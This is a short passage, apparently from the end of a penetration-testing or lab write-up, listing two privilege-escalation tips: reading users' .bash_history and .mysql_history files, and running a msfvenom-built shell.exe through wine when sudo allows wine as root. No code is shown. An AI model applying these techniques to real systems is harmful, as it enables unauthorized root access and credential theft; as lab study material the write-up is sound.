  2. Focus on checking whether each user's .bash_history and .mysql_history files can be read.

  3. When sudo -l shows that wine can be run as root, wine itself does not escalate privileges directly, but wine can execute exe files, so a shell.exe generated with msfvenom can be run through it.

posted @ 2023-03-10 15:20  Jason_huawen